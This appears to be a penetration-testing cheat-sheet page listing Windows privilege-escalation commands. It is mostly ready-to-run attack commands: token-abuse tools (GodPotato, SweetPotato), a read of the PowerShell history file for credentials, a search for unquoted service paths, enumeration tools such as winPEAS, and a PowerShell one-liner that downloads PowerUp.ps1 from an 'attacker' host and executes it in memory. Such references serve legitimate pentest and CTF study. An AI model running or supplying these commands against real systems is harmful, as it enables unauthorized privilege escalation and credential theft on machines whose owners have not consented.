>_ shadow.red
root@shadow:~/privilege-escalation$ ls
[03]

Privilege Escalation

Alert! To view more content, click the description below a terminal command.

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Windows Misc windows
GodPotato.exe -cmd cmd.exe
Windows Tokens windows
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1
Windows Tools windows
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Windows Credentials windows
powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker/PowerUp.ps1');Invoke-AllChecks
Windows Tools windows
.\SweetPotato.exe -p test.bat
Windows Tokens windows
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
Windows Services windows
./windows-exploit-suggester.py --database 2021-12-26-mssb.xls --systeminfo systeminfo.txt
Windows Tools windows linux
.\winPEAS.exe
Windows Tools windows